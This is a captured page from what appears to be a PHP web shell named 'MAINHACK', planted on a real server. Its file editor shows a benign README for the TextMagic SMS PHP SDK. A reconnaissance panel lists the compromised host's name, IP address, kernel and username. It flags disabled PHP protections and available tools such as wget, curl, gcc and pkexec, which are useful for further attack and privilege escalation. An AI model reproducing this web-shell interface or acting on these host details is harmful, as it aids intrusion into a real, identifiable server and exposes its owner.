[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: README.md
## Synopsis The TextMagic SMS API PHP wrapper can save you a lot of time, as it includes all the necessary API commands and tests. It only takes a few seconds to download it from GitHub and to install it into your own app or software. After installation, you’ll then be able to send text messages. <!--- sms api for PHP PHP api to send sms PHP sms api send sms from PHP PHP send sms messages PHP library send sms messages --> ## Code Example ``` $client = new TextmagicRestClient('<USERNAME>', '<APIV2_TOKEN>'); $result = ' '; try { $result = $client->messages->create( array( 'text' => 'Hello from TextMagic PHP', 'phones' => implode(', ', array('99900000')) ) ); } catch (\Exception $e) { if ($e instanceof RestException) { print '[ERROR] ' . $e->getMessage() . "\n"; foreach ($e->getErrors() as $key => $value) { print '[' . $key . '] ' . implode(',', $value) . "\n"; } } else { print '[ERROR] ' . $e->getMessage() . "\n"; } return; } echo $result['id']; ``` ## Installation Instructions ### Quick Installation Run the following command to install the TextMagic PHP wrapper using composer: a package management system used to install and manage software packages written in PHP: ``` composer require textmagic/sdk ``` ### Manual Installation You can also install the TextMagic PHP wrapper from the GitHub repository using git. Run the following commands: ``` git clone git://github.com/textmagic/textmagic-rest-php.git cd textmagic-rest-php ``` ## Requirements The PHP wrapper has the following requirements: * PHP 5.2.1 or higher * phpunit 4.5 or higher ## API Reference * https://www.textmagic.com/docs/api/php/ * https://rest.textmagic.com/api/v2/doc ## License The library is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002